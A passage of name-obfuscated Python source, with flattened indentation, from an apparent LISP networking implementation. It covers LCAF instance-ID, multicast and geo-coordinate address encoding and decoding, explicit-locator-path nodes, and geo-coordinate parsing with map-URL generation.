Oo0OO0oO = Oo0OO0oO . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == Oo0OO0oO )
if 45 - 45: o0oOOo0O0Ooo . I1Ii111 % Ii1I
if ( self . is_ipv6 ( ) ) :
Oo0OO0oO = lisp_myrlocs [ 1 ]
if ( Oo0OO0oO == None ) : return ( False )
Oo0OO0oO = Oo0OO0oO . print_address_no_iid ( )
return ( self . print_address_no_iid ( ) == Oo0OO0oO )
if 42 - 42: Oo0Ooo + i11iIiiIii - OOooOOo . I1ii11iIi11i % I1Ii111 . I1ii11iIi11i
return ( False )
if 59 - 59: OoooooooOO
if 91 - 91: i11iIiiIii / Oo0Ooo % I11i / O0
def store_iid_range ( self , iid , mask_len ) :
if ( self . afi == LISP_AFI_NONE ) :
if ( iid == 0 and mask_len == 0 ) : self . afi = LISP_AFI_ULTIMATE_ROOT
else : self . afi = LISP_AFI_IID_RANGE
if 80 - 80: II111iiii / I1ii11iIi11i % I1IiiI . Ii1I
self . instance_id = iid
self . mask_len = mask_len
if 8 - 8: oO0o
if 21 - 21: oO0o + iII111i . i11iIiiIii - II111iiii
def lcaf_length ( self , lcaf_type ) :
iI = self . addr_length ( ) + 2
if ( lcaf_type == LISP_LCAF_AFI_LIST_TYPE ) : iI += 4
if ( lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE ) : iI += 4
if ( lcaf_type == LISP_LCAF_ASN_TYPE ) : iI += 4
if ( lcaf_type == LISP_LCAF_APP_DATA_TYPE ) : iI += 8
if ( lcaf_type == LISP_LCAF_GEO_COORD_TYPE ) : iI += 12
if ( lcaf_type == LISP_LCAF_OPAQUE_TYPE ) : iI += 0
if ( lcaf_type == LISP_LCAF_NAT_TYPE ) : iI += 4
if ( lcaf_type == LISP_LCAF_NONCE_LOC_TYPE ) : iI += 4
if ( lcaf_type == LISP_LCAF_MCAST_INFO_TYPE ) : iI = iI * 2 + 8
if ( lcaf_type == LISP_LCAF_ELP_TYPE ) : iI += 0
if ( lcaf_type == LISP_LCAF_SECURITY_TYPE ) : iI += 6
if ( lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE ) : iI += 4
if ( lcaf_type == LISP_LCAF_RLE_TYPE ) : iI += 4
return ( iI )
if 14 - 14: I1Ii111
if 81 - 81: II111iiii
if 55 - 55: O0 + o0oOOo0O0Ooo * I1IiiI - OoooooooOO
if 68 - 68: I11i + Oo0Ooo
if 15 - 15: O0
if 75 - 75: iII111i / OoOoOO00
if 2 - 2: i1IIi + oO0o % iII111i % I1ii11iIi11i + ooOoO0o . iII111i
if 26 - 26: I11i + o0oOOo0O0Ooo + Ii1I % I11i
if 95 - 95: IiII - O0 * oO0o * O0
if 47 - 47: I1IiiI
if 20 - 20: I1Ii111
if 40 - 40: OoooooooOO / o0oOOo0O0Ooo + OoOoOO00
if 73 - 73: OOooOOo / Oo0Ooo
if 80 - 80: OoO0O00 + I1IiiI % i1IIi / I11i % i1IIi * i11iIiiIii
if 27 - 27: OoOoOO00 / I1Ii111 * O0 / I1IiiI - IiII / o0oOOo0O0Ooo
if 70 - 70: I1ii11iIi11i
if 11 - 11: I1Ii111
def lcaf_encode_iid ( self ) :
ooOoOoOo = LISP_LCAF_INSTANCE_ID_TYPE
OOoo = socket . htons ( self . lcaf_length ( ooOoOoOo ) )
i1oO00O = self . instance_id
O0ooO0O00oo0 = self . afi
O00o00 = 0
if ( O0ooO0O00oo0 < 0 ) :
if ( self . afi == LISP_AFI_GEO_COORD ) :
O0ooO0O00oo0 = LISP_AFI_LCAF
O00o00 = 0
else :
O0ooO0O00oo0 = 0
O00o00 = self . mask_len
if 70 - 70: Ii1I
if 22 - 22: Ii1I
if 59 - 59: I1ii11iIi11i
oO00o = struct . pack ( "BBBBH" , 0 , 0 , ooOoOoOo , O00o00 , OOoo )
oO00o += struct . pack ( "IH" , socket . htonl ( i1oO00O ) , socket . htons ( O0ooO0O00oo0 ) )
if ( O0ooO0O00oo0 == 0 ) : return ( oO00o )
if 53 - 53: o0oOOo0O0Ooo * Oo0Ooo % I1IiiI
if ( self . afi == LISP_AFI_GEO_COORD ) :
oO00o = oO00o [ 0 : - 2 ]
oO00o += self . address . encode_geo ( )
return ( oO00o )
if 68 - 68: Oo0Ooo
if 85 - 85: OoOoOO00 - OoO0O00 + Ii1I
oO00o += self . pack_address ( )
return ( oO00o )
if 30 - 30: OoOoOO00 - O0 + iII111i / OoO0O00 . oO0o + iIii1I11I1II1
if 19 - 19: Oo0Ooo . IiII - o0oOOo0O0Ooo / II111iiii . O0 - II111iiii
def lcaf_decode_iid ( self , packet ) :
Iii1iIII1Iii = "BBBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 75 - 75: OOooOOo % OoOoOO00 + iIii1I11I1II1 - II111iiii / i1IIi
ooooO00o0 , o00oOo0O0OO , ooOoOoOo , I111II , iI = struct . unpack ( Iii1iIII1Iii ,
packet [ : oOoOo000Ooooo ] )
packet = packet [ oOoOo000Ooooo : : ]
if 22 - 22: I1Ii111 - OOooOOo * i1IIi
if ( ooOoOoOo != LISP_LCAF_INSTANCE_ID_TYPE ) : return ( None )
if 88 - 88: ooOoO0o + iIii1I11I1II1 + OoO0O00 * I1Ii111 + oO0o
Iii1iIII1Iii = "IH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 39 - 39: ooOoO0o - oO0o + OoOoOO00 - oO0o - Ii1I % I1Ii111
i1oO00O , O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
packet = packet [ oOoOo000Ooooo : : ]
if 100 - 100: OOooOOo * IiII % IiII / o0oOOo0O0Ooo * OoO0O00 % OoOoOO00
iI = socket . ntohs ( iI )
self . instance_id = socket . ntohl ( i1oO00O )
O0ooO0O00oo0 = socket . ntohs ( O0ooO0O00oo0 )
self . afi = O0ooO0O00oo0
if ( I111II != 0 and O0ooO0O00oo0 == 0 ) : self . mask_len = I111II
if ( O0ooO0O00oo0 == 0 ) :
self . afi = LISP_AFI_IID_RANGE if I111II else LISP_AFI_ULTIMATE_ROOT
if 12 - 12: I1IiiI
if 32 - 32: I1Ii111
if 35 - 35: O0 + II111iiii + o0oOOo0O0Ooo - OoO0O00 - Ii1I
if 88 - 88: I1ii11iIi11i . O0 - o0oOOo0O0Ooo . I1ii11iIi11i * iII111i * I11i
if 89 - 89: Oo0Ooo - oO0o + O0 / i11iIiiIii
if ( O0ooO0O00oo0 == 0 ) : return ( packet )
if 64 - 64: OoO0O00 % OoOoOO00 % I1IiiI - Ii1I / IiII * Ii1I
if 74 - 74: IiII - O0 % OOooOOo % OoooooooOO - I11i
if 4 - 4: i1IIi + OoOoOO00 + iIii1I11I1II1 - i1IIi * i11iIiiIii
if 99 - 99: I1ii11iIi11i - O0 % II111iiii + ooOoO0o % OoO0O00 * Ii1I
if ( self . is_dist_name ( ) ) :
packet , self . address = lisp_decode_dist_name ( packet )
self . mask_len = len ( self . address ) * 8
return ( packet )
if 8 - 8: OOooOOo
if 85 - 85: O0 % OOooOOo . Ii1I
if 74 - 74: I1ii11iIi11i - I1Ii111 + i11iIiiIii / I1Ii111 / OoooooooOO + o0oOOo0O0Ooo
if 23 - 23: Oo0Ooo
if 91 - 91: I1Ii111
if ( O0ooO0O00oo0 == LISP_AFI_LCAF ) :
Iii1iIII1Iii = "BBBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 59 - 59: i1IIi % OOooOOo
i1ii1iiI11ii1II1 , IIi1 , ooOoOoOo , oo0oOOo0 , iIi1IiiIII = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 81 - 81: i11iIiiIii / OoO0O00 * OoOoOO00 % iII111i - iIii1I11I1II1 + I1ii11iIi11i
if 20 - 20: O0 . I1Ii111 * Ii1I * II111iiii
if ( ooOoOoOo != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 66 - 66: Ii1I % OoO0O00 % II111iiii - OOooOOo * o0oOOo0O0Ooo
iIi1IiiIII = socket . ntohs ( iIi1IiiIII )
packet = packet [ oOoOo000Ooooo : : ]
if ( iIi1IiiIII > len ( packet ) ) : return ( None )
if 33 - 33: OoooooooOO / I11i
OOiIiIi111ii1I1 = lisp_geo ( "" )
self . afi = LISP_AFI_GEO_COORD
self . address = OOiIiIi111ii1I1
packet = OOiIiIi111ii1I1 . decode_geo ( packet , iIi1IiiIII , oo0oOOo0 )
self . mask_len = self . host_mask_len ( )
return ( packet )
if 98 - 98: I1ii11iIi11i . Ii1I . iIii1I11I1II1 * I1ii11iIi11i / Ii1I
if 74 - 74: Oo0Ooo * I1Ii111
OOoo = self . addr_length ( )
if ( len ( packet ) < OOoo ) : return ( None )
if 72 - 72: OoOoOO00 + O0 - IiII * ooOoO0o
packet = self . unpack_address ( packet )
return ( packet )
if 20 - 20: II111iiii % OoOoOO00 * i11iIiiIii
if 68 - 68: IiII / ooOoO0o
if 100 - 100: ooOoO0o / I1IiiI
if 69 - 69: ooOoO0o + OoO0O00 * o0oOOo0O0Ooo - ooOoO0o
if 66 - 66: OoooooooOO / iII111i / I1IiiI % ooOoO0o / OoO0O00 + OOooOOo
if 64 - 64: i1IIi
if 26 - 26: OoOoOO00 / o0oOOo0O0Ooo . OOooOOo + I1IiiI + Ii1I . iII111i
if 89 - 89: I1Ii111 * I1IiiI . i1IIi - iIii1I11I1II1 * I1Ii111
if 5 - 5: OoOoOO00 % i1IIi
if 31 - 31: Oo0Ooo * O0 . OOooOOo . o0oOOo0O0Ooo + OoO0O00 + II111iiii
if 76 - 76: Oo0Ooo + I1IiiI - O0
if 58 - 58: IiII * i1IIi . I1IiiI - iII111i
if 73 - 73: Oo0Ooo . OoOoOO00
if 50 - 50: IiII / o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
if 34 - 34: OoooooooOO + OoOoOO00 - Oo0Ooo . OOooOOo * iIii1I11I1II1
if 93 - 93: i11iIiiIii / Oo0Ooo * OoOoOO00 / ooOoO0o + OoO0O00 * OOooOOo
if 81 - 81: IiII * iII111i + i1IIi + I1Ii111 / OoO0O00
if 83 - 83: oO0o / OoO0O00
if 34 - 34: OoooooooOO - i1IIi * O0
def lcaf_encode_sg ( self , group ) :
ooOoOoOo = LISP_LCAF_MCAST_INFO_TYPE
i1oO00O = socket . htonl ( self . instance_id )
OOoo = socket . htons ( self . lcaf_length ( ooOoOoOo ) )
oO00o = struct . pack ( "BBBBHIHBB" , 0 , 0 , ooOoOoOo , 0 , OOoo , i1oO00O ,
0 , self . mask_len , group . mask_len )
if 83 - 83: I1IiiI + OoO0O00
oO00o += struct . pack ( "H" , socket . htons ( self . afi ) )
oO00o += self . pack_address ( )
oO00o += struct . pack ( "H" , socket . htons ( group . afi ) )
oO00o += group . pack_address ( )
return ( oO00o )
if 41 - 41: Ii1I + II111iiii . OOooOOo * I1Ii111 / II111iiii
if 32 - 32: Oo0Ooo - Ii1I % o0oOOo0O0Ooo
def lcaf_decode_sg ( self , packet ) :
Iii1iIII1Iii = "BBBBHIHBB"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( [ None , None ] )
if 15 - 15: iIii1I11I1II1 * I1ii11iIi11i / ooOoO0o * oO0o % OOooOOo
ooooO00o0 , o00oOo0O0OO , ooOoOoOo , OOOo00o , iI , i1oO00O , O0oO , o0o0OOOOoO , Oo0O0O = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 61 - 61: o0oOOo0O0Ooo % OOooOOo % I1IiiI % I1ii11iIi11i % ooOoO0o + i11iIiiIii
packet = packet [ oOoOo000Ooooo : : ]
if 76 - 76: O0
if ( ooOoOoOo != LISP_LCAF_MCAST_INFO_TYPE ) : return ( [ None , None ] )
if 81 - 81: I11i - o0oOOo0O0Ooo % Ii1I / I1Ii111 * II111iiii
self . instance_id = socket . ntohl ( i1oO00O )
iI = socket . ntohs ( iI ) - 8
if 40 - 40: OoO0O00 . i11iIiiIii
if 36 - 36: o0oOOo0O0Ooo * iII111i / I1ii11iIi11i % i1IIi % I1ii11iIi11i + i11iIiiIii
if 24 - 24: I1Ii111 / ooOoO0o - i11iIiiIii
if 32 - 32: II111iiii * Ii1I . ooOoO0o * Oo0Ooo - I1ii11iIi11i % I11i
if 96 - 96: Ii1I / OOooOOo / O0
Iii1iIII1Iii = "H"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( [ None , None ] )
if ( iI < oOoOo000Ooooo ) : return ( [ None , None ] )
if 8 - 8: iII111i + OOooOOo / I1ii11iIi11i . iII111i
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
iI -= oOoOo000Ooooo
self . afi = socket . ntohs ( O0ooO0O00oo0 )
self . mask_len = o0o0OOOOoO
OOoo = self . addr_length ( )
if ( iI < OOoo ) : return ( [ None , None ] )
if 45 - 45: i1IIi
packet = self . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 28 - 28: iII111i
iI -= OOoo
if 28 - 28: i1IIi - iII111i + o0oOOo0O0Ooo / Oo0Ooo * oO0o
if 8 - 8: ooOoO0o + OOooOOo * ooOoO0o / i1IIi . I1ii11iIi11i
if 4 - 4: Ii1I - Oo0Ooo . i1IIi + iIii1I11I1II1
if 28 - 28: O0 / ooOoO0o / IiII - I11i + IiII + OoO0O00
if 84 - 84: Oo0Ooo + OoOoOO00 / iII111i . I1ii11iIi11i
Iii1iIII1Iii = "H"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( [ None , None ] )
if ( iI < oOoOo000Ooooo ) : return ( [ None , None ] )
if 26 - 26: Oo0Ooo
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
iI -= oOoOo000Ooooo
o0o0o = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
o0o0o . afi = socket . ntohs ( O0ooO0O00oo0 )
o0o0o . mask_len = Oo0O0O
o0o0o . instance_id = self . instance_id
OOoo = self . addr_length ( )
if ( iI < OOoo ) : return ( [ None , None ] )
if 61 - 61: Ii1I * oO0o * i11iIiiIii + OoO0O00
packet = o0o0o . unpack_address ( packet )
if ( packet == None ) : return ( [ None , None ] )
if 43 - 43: OoO0O00 * OoO0O00 * oO0o
return ( [ packet , o0o0o ] )
if 24 - 24: oO0o
if 77 - 77: i11iIiiIii - I1Ii111 - I1ii11iIi11i * Oo0Ooo / i11iIiiIii
def lcaf_decode_eid ( self , packet ) :
Iii1iIII1Iii = "BBB"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( [ None , None ] )
if 79 - 79: Oo0Ooo % Oo0Ooo . oO0o + ooOoO0o * iII111i * I11i
if 87 - 87: o0oOOo0O0Ooo + OoOoOO00 % o0oOOo0O0Ooo + I1IiiI
if 89 - 89: II111iiii
if 41 - 41: iIii1I11I1II1
if 26 - 26: Oo0Ooo / i1IIi + Oo0Ooo
OOOo00o , IIi1 , ooOoOoOo = struct . unpack ( Iii1iIII1Iii ,
packet [ : oOoOo000Ooooo ] )
if 76 - 76: I1ii11iIi11i * i1IIi % oO0o
if ( ooOoOoOo == LISP_LCAF_INSTANCE_ID_TYPE ) :
return ( [ self . lcaf_decode_iid ( packet ) , None ] )
elif ( ooOoOoOo == LISP_LCAF_MCAST_INFO_TYPE ) :
packet , o0o0o = self . lcaf_decode_sg ( packet )
return ( [ packet , o0o0o ] )
elif ( ooOoOoOo == LISP_LCAF_GEO_COORD_TYPE ) :
Iii1iIII1Iii = "BBBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 80 - 80: i1IIi * II111iiii . O0 % I1ii11iIi11i / ooOoO0o
i1ii1iiI11ii1II1 , IIi1 , ooOoOoOo , oo0oOOo0 , iIi1IiiIII = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 58 - 58: I1IiiI * I1ii11iIi11i - i1IIi % I1Ii111 % O0
if 24 - 24: I11i + I11i % I11i
if ( ooOoOoOo != LISP_LCAF_GEO_COORD_TYPE ) : return ( None )
if 63 - 63: i11iIiiIii + iIii1I11I1II1 / oO0o % IiII - O0
iIi1IiiIII = socket . ntohs ( iIi1IiiIII )
packet = packet [ oOoOo000Ooooo : : ]
if ( iIi1IiiIII > len ( packet ) ) : return ( None )
if 21 - 21: II111iiii
OOiIiIi111ii1I1 = lisp_geo ( "" )
self . instance_id = 0
self . afi = LISP_AFI_GEO_COORD
self . address = OOiIiIi111ii1I1
packet = OOiIiIi111ii1I1 . decode_geo ( packet , iIi1IiiIII , oo0oOOo0 )
self . mask_len = self . host_mask_len ( )
if 89 - 89: OOooOOo % i11iIiiIii * OoOoOO00 % oO0o / O0 * i1IIi
return ( [ packet , None ] )
if 16 - 16: IiII
if 42 - 42: i1IIi / Ii1I * I1ii11iIi11i
if 9 - 9: I11i % i1IIi / i1IIi / OoO0O00
if 46 - 46: I1Ii111 * II111iiii + II111iiii * O0 % II111iiii
if 37 - 37: OOooOOo . iIii1I11I1II1 / O0 . ooOoO0o + OOooOOo - OoooooooOO
if 96 - 96: I1Ii111 / oO0o . I1ii11iIi11i % I1IiiI * OOooOOo
class lisp_elp_node ( object ) :
def __init__ ( self ) :
self . address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . probe = False
self . strict = False
self . eid = False
self . we_are_last = False
if 99 - 99: i11iIiiIii - I1Ii111
if 4 - 4: o0oOOo0O0Ooo - i11iIiiIii . iIii1I11I1II1 . OOooOOo % IiII
def copy_elp_node ( self ) :
oO0 = lisp_elp_node ( )
oO0 . copy_address ( self . address )
oO0 . probe = self . probe
oO0 . strict = self . strict
oO0 . eid = self . eid
oO0 . we_are_last = self . we_are_last
return ( oO0 )
if 68 - 68: I11i / iII111i - IiII . iIii1I11I1II1 / o0oOOo0O0Ooo
if 54 - 54: II111iiii * I1IiiI
if 49 - 49: I1ii11iIi11i
class lisp_elp ( object ) :
def __init__ ( self , name ) :
self . elp_name = name
self . elp_nodes = [ ]
self . use_elp_node = None
self . we_are_last = False
if 31 - 31: o0oOOo0O0Ooo - OoOoOO00 + I1ii11iIi11i . oO0o - O0
if 61 - 61: I1ii11iIi11i * II111iiii . i1IIi
def copy_elp ( self ) :
Ooooo = lisp_elp ( self . elp_name )
Ooooo . use_elp_node = self . use_elp_node
Ooooo . we_are_last = self . we_are_last
for oO0 in self . elp_nodes :
Ooooo . elp_nodes . append ( oO0 . copy_elp_node ( ) )
if 60 - 60: OoooooooOO % ooOoO0o * i11iIiiIii * OoooooooOO % IiII
return ( Ooooo )
if 15 - 15: oO0o
if 40 - 40: I1Ii111
def print_elp ( self , want_marker ) :
iIII1Iiii = ""
for oO0 in self . elp_nodes :
oooO0OO0 = ""
if ( want_marker ) :
if ( oO0 == self . use_elp_node ) :
oooO0OO0 = "*"
elif ( oO0 . we_are_last ) :
oooO0OO0 = "x"
if 54 - 54: I1Ii111 % OoO0O00 - OoooooooOO
if 96 - 96: IiII
iIII1Iiii += "{}{}({}{}{}), " . format ( oooO0OO0 ,
oO0 . address . print_address_no_iid ( ) ,
"r" if oO0 . eid else "R" , "P" if oO0 . probe else "p" ,
"S" if oO0 . strict else "s" )
if 31 - 31: Ii1I + O0 - OOooOOo * O0 * I11i
return ( iIII1Iiii [ 0 : - 2 ] if iIII1Iiii != "" else "" )
if 53 - 53: I1ii11iIi11i + i11iIiiIii / iIii1I11I1II1 + OoooooooOO + IiII * I1IiiI
if 16 - 16: i11iIiiIii - oO0o . i11iIiiIii + OoO0O00 + i11iIiiIii
def select_elp_node ( self ) :
OOO0O00oo , iII1Ii1IiiIii , OoO0 = lisp_myrlocs
OOOooo0OooOoO = None
if 93 - 93: OoOoOO00
for oO0 in self . elp_nodes :
if ( OOO0O00oo and oO0 . address . is_exact_match ( OOO0O00oo ) ) :
OOOooo0OooOoO = self . elp_nodes . index ( oO0 )
break
if 48 - 48: i1IIi
if ( iII1Ii1IiiIii and oO0 . address . is_exact_match ( iII1Ii1IiiIii ) ) :
OOOooo0OooOoO = self . elp_nodes . index ( oO0 )
break
if 22 - 22: iII111i / OoO0O00 * OOooOOo + I11i
if 84 - 84: IiII * IiII * o0oOOo0O0Ooo
if 17 - 17: II111iiii * I1IiiI + II111iiii + I1IiiI % I11i * oO0o
if 51 - 51: I1IiiI
if 35 - 35: OOooOOo % oO0o
if 73 - 73: II111iiii / i11iIiiIii
if 91 - 91: OOooOOo
if ( OOOooo0OooOoO == None ) :
self . use_elp_node = self . elp_nodes [ 0 ]
oO0 . we_are_last = False
return
if 92 - 92: o0oOOo0O0Ooo % o0oOOo0O0Ooo + I1IiiI
if 35 - 35: oO0o + iII111i + I11i - I1ii11iIi11i - ooOoO0o - OOooOOo
if 77 - 77: OoooooooOO + OoooooooOO / oO0o * o0oOOo0O0Ooo / I11i
if 86 - 86: I1IiiI % IiII - IiII
if 1 - 1: o0oOOo0O0Ooo + OoOoOO00 / OOooOOo % IiII
if 16 - 16: IiII . I11i * O0 + OoooooooOO
if ( self . elp_nodes [ - 1 ] == self . elp_nodes [ OOOooo0OooOoO ] ) :
self . use_elp_node = None
oO0 . we_are_last = True
return
if 37 - 37: OoO0O00 . i11iIiiIii - i11iIiiIii % I1Ii111 + II111iiii * i11iIiiIii
if 83 - 83: OOooOOo % O0 - I11i . Ii1I % IiII
if 45 - 45: I11i % OoO0O00
if 18 - 18: Ii1I / Ii1I * IiII
if 33 - 33: ooOoO0o
self . use_elp_node = self . elp_nodes [ OOOooo0OooOoO + 1 ]
return
if 14 - 14: Oo0Ooo % I1Ii111 % ooOoO0o . oO0o * iIii1I11I1II1 . I1ii11iIi11i
if 50 - 50: O0 * i11iIiiIii / iIii1I11I1II1 . I11i + i11iIiiIii
if 68 - 68: oO0o + o0oOOo0O0Ooo * iIii1I11I1II1 / i1IIi
class lisp_geo ( object ) :
def __init__ ( self , name ) :
self . geo_name = name
self . latitude = 0xffffffff
self . lat_mins = 0
self . lat_secs = 0
self . longitude = 0xffffffff
self . long_mins = 0
self . long_secs = 0
self . altitude = - 1
self . radius = 0
if 9 - 9: I11i % OoO0O00 . oO0o / I1ii11iIi11i
if 88 - 88: Oo0Ooo / IiII / II111iiii / I1ii11iIi11i + OoooooooOO
def copy_geo ( self ) :
OOiIiIi111ii1I1 = lisp_geo ( self . geo_name )
OOiIiIi111ii1I1 . latitude = self . latitude
OOiIiIi111ii1I1 . lat_mins = self . lat_mins
OOiIiIi111ii1I1 . lat_secs = self . lat_secs
OOiIiIi111ii1I1 . longitude = self . longitude
OOiIiIi111ii1I1 . long_mins = self . long_mins
OOiIiIi111ii1I1 . long_secs = self . long_secs
OOiIiIi111ii1I1 . altitude = self . altitude
OOiIiIi111ii1I1 . radius = self . radius
return ( OOiIiIi111ii1I1 )
if 65 - 65: iII111i % oO0o * IiII
if 16 - 16: iII111i % I11i % OoOoOO00
def no_geo_altitude ( self ) :
return ( self . altitude == - 1 )
if 80 - 80: OoooooooOO * i11iIiiIii % oO0o / Oo0Ooo - I1ii11iIi11i
if 92 - 92: o0oOOo0O0Ooo % i1IIi / I1Ii111 % ooOoO0o / oO0o
def parse_geo_string ( self , geo_str ) :
OOOooo0OooOoO = geo_str . find ( "]" )
if ( OOOooo0OooOoO != - 1 ) : geo_str = geo_str [ OOOooo0OooOoO + 1 : : ]
if 2 - 2: i11iIiiIii / Ii1I - i1IIi % O0
if 12 - 12: Oo0Ooo + I1ii11iIi11i
if 54 - 54: OoO0O00 . o0oOOo0O0Ooo / I11i
if 95 - 95: i1IIi . I1Ii111
if 94 - 94: I1IiiI + Ii1I + i1IIi . iIii1I11I1II1
if ( geo_str . find ( "/" ) != - 1 ) :
geo_str , Oo0OOoO0oo0oO = geo_str . split ( "/" )
self . radius = int ( Oo0OOoO0oo0oO )
if 31 - 31: iIii1I11I1II1 + I1IiiI
if 82 - 82: I1Ii111 / Ii1I % OoooooooOO - IiII / OoooooooOO
geo_str = geo_str . split ( "-" )
if ( len ( geo_str ) < 8 ) : return ( False )
if 23 - 23: iIii1I11I1II1
I1I1iiiI1i = geo_str [ 0 : 4 ]
ooiii1iiI1 = geo_str [ 4 : 8 ]
if 48 - 48: II111iiii % I1ii11iIi11i - II111iiii
if 29 - 29: I1Ii111 - I1Ii111 - I11i * iIii1I11I1II1 % OoO0O00 % IiII
if 73 - 73: i1IIi . OoooooooOO / OoOoOO00 % Ii1I / Ii1I / Ii1I
if 40 - 40: I1Ii111 - iIii1I11I1II1
if ( len ( geo_str ) > 8 ) : self . altitude = int ( geo_str [ 8 ] )
if 88 - 88: OOooOOo * O0 * OoOoOO00
if 26 - 26: Ii1I
if 65 - 65: iII111i / iIii1I11I1II1 + I11i - iIii1I11I1II1 - Ii1I . I1Ii111
if 77 - 77: OoOoOO00 / I1IiiI + IiII
self . latitude = int ( I1I1iiiI1i [ 0 ] )
self . lat_mins = int ( I1I1iiiI1i [ 1 ] )
self . lat_secs = int ( I1I1iiiI1i [ 2 ] )
if ( I1I1iiiI1i [ 3 ] == "N" ) : self . latitude = - self . latitude
if 66 - 66: i11iIiiIii * OoooooooOO + iII111i / Ii1I
if 42 - 42: Ii1I / iIii1I11I1II1 / Oo0Ooo . O0 . oO0o * I1IiiI
if 21 - 21: OoooooooOO
if 76 - 76: i1IIi * i11iIiiIii / OOooOOo + I1Ii111
self . longitude = int ( ooiii1iiI1 [ 0 ] )
self . long_mins = int ( ooiii1iiI1 [ 1 ] )
self . long_secs = int ( ooiii1iiI1 [ 2 ] )
if ( ooiii1iiI1 [ 3 ] == "E" ) : self . longitude = - self . longitude
return ( True )
if 50 - 50: oO0o % OoOoOO00 + I1IiiI
if 15 - 15: II111iiii - iII111i / I1ii11iIi11i
def print_geo ( self ) :
O00o0O0OO = "N" if self . latitude < 0 else "S"
OO0OO0 = "E" if self . longitude < 0 else "W"
if 75 - 75: OoO0O00 % iII111i
oOIIi = "{}-{}-{}-{}-{}-{}-{}-{}" . format ( abs ( self . latitude ) ,
self . lat_mins , self . lat_secs , O00o0O0OO , abs ( self . longitude ) ,
self . long_mins , self . long_secs , OO0OO0 )
if 46 - 46: o0oOOo0O0Ooo
if ( self . no_geo_altitude ( ) == False ) :
oOIIi += "-" + str ( self . altitude )
if 61 - 61: OoO0O00 . O0 + I1ii11iIi11i + OoO0O00
if 44 - 44: I11i . oO0o
if 65 - 65: I1ii11iIi11i * II111iiii % I11i + II111iiii . i1IIi / ooOoO0o
if 74 - 74: OoOoOO00 % OoO0O00 . OoOoOO00
if 16 - 16: OoO0O00 / Ii1I * i11iIiiIii / o0oOOo0O0Ooo + I1Ii111
if ( self . radius != 0 ) : oOIIi += "/{}" . format ( self . radius )
return ( oOIIi )
if 21 - 21: I11i % I1ii11iIi11i
if 8 - 8: OOooOOo % OoO0O00 + O0 - o0oOOo0O0Ooo
def geo_url ( self ) :
IIIOo0oo00 = os . getenv ( "LISP_GEO_ZOOM_LEVEL" )
IIIOo0oo00 = "10" if ( IIIOo0oo00 == "" or IIIOo0oo00 . isdigit ( ) == False ) else IIIOo0oo00
o0OO0 , ii11II1I1 = self . dms_to_decimal ( )
o000OoO0oO0O = ( "http://maps.googleapis.com/maps/api/staticmap?center={},{}" + "&markers=color:blue%7Clabel:lisp%7C{},{}" + "&zoom={}&size=1024x1024&sensor=false" ) . format ( o0OO0 , ii11II1I1 , o0OO0 , ii11II1I1 ,
# I11i * iII111i + Oo0Ooo / i1IIi
# OoO0O00 + iII111i . Oo0Ooo
IIIOo0oo00 )
return ( o000OoO0oO0O )
if 2 - 2: I1ii11iIi11i
if 12 - 12: Ii1I - I1ii11iIi11i
def print_geo_url ( self ) :
OOiIiIi111ii1I1 = self . print_geo ( )
if ( self . radius == 0 ) :
o000OoO0oO0O = self . geo_url ( )
Oo0OOOOOOO0oo = "<a href='{}'>{}</a>" . format ( o000OoO0oO0O , OOiIiIi111ii1I1 )
else :
o000OoO0oO0O = OOiIiIi111ii1I1 . replace ( "/" , "-" )
Oo0OOOOOOO0oo = "<a href='/lisp/geo-map/{}'>{}</a>" . format ( o000OoO0oO0O , OOiIiIi111ii1I1 )
if 10 - 10: Ii1I * i11iIiiIii - ooOoO0o
return ( Oo0OOOOOOO0oo )
if 65 - 65: OoOoOO00 * I1ii11iIi11i - I11i - OOooOOo
if 13 - 13: I11i + II111iiii + I1ii11iIi11i * i11iIiiIii
def dms_to_decimal ( self ) :
O0oI1Ii1II , i11ii1 , I11II11 = self . latitude , self . lat_mins , self . lat_secs
iII1i = float ( abs ( O0oI1Ii1II ) )
iII1i += float ( i11ii1 * 60 + I11II11 ) / 3600
if ( O0oI1Ii1II > 0 ) : iII1i = - iII1i
I11111i1 = iII1i
if 33 - 33: oO0o . iII111i + Oo0Ooo
O0oI1Ii1II , i11ii1 , I11II11 = self . longitude , self . long_mins , self . long_secs
iII1i = float ( abs ( O0oI1Ii1II ) )
iII1i += float ( i11ii1 * 60 + I11II11 ) / 3600
if ( O0oI1Ii1II > 0 ) : iII1i = - iII1i
